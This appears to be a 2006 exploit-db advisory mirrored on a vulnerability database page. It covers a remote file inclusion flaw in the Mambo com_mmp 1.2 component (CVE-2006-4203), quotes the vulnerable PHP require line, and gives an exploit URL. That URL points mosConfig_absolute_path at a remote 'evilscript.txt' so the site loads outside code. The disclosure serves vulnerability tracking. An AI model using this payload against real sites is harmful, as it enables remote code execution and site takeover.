Lucene search
MdxEDB-ID:2182HistoryAug 14, 2006 - 12:00 a.m.
Mambo Component MMP 1.2 - Remote File Inclusion
2006-08-1400:00:00
mdx
www.exploit-db.com
27
AI Score
7.4
Confidence
Low
####################################################
# #
# C Y BE R - W A R R i O R T I M #
# #
####################################################
mambo com_mmp Component (mosConfig_absolute_path) Remote File Inclusion Vulnerabilities
####################################################
Author: mdx
####################################################
Class : Remote
####################################################
cont@ct: bilkopat[at]hotmail[dot]com
####################################################
Code: help.mmp.php?, line 12
<?php
global $mosConfig_absolute_path;
require $mosConfig_absolute_path .
"/administrator/components/com_mmp/diagnostics.mmp.php";
diagnostics();
?>
Exploit:
http://www.site.com/[path]/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://site.com/evilscript.txt?
####################################################
Greetz: Cyber-warrior TIM USERS and xoron
####################################################
# milw0rm.com [2006-08-14]Related
cve
cve
CVE-2006-4203
2006-08-17 21:04:00
cvelist
cvelist
CVE-2006-4203
2006-08-17 21:00:00
nvd
nvd
CVE-2006-4203
2006-08-17 21:04:00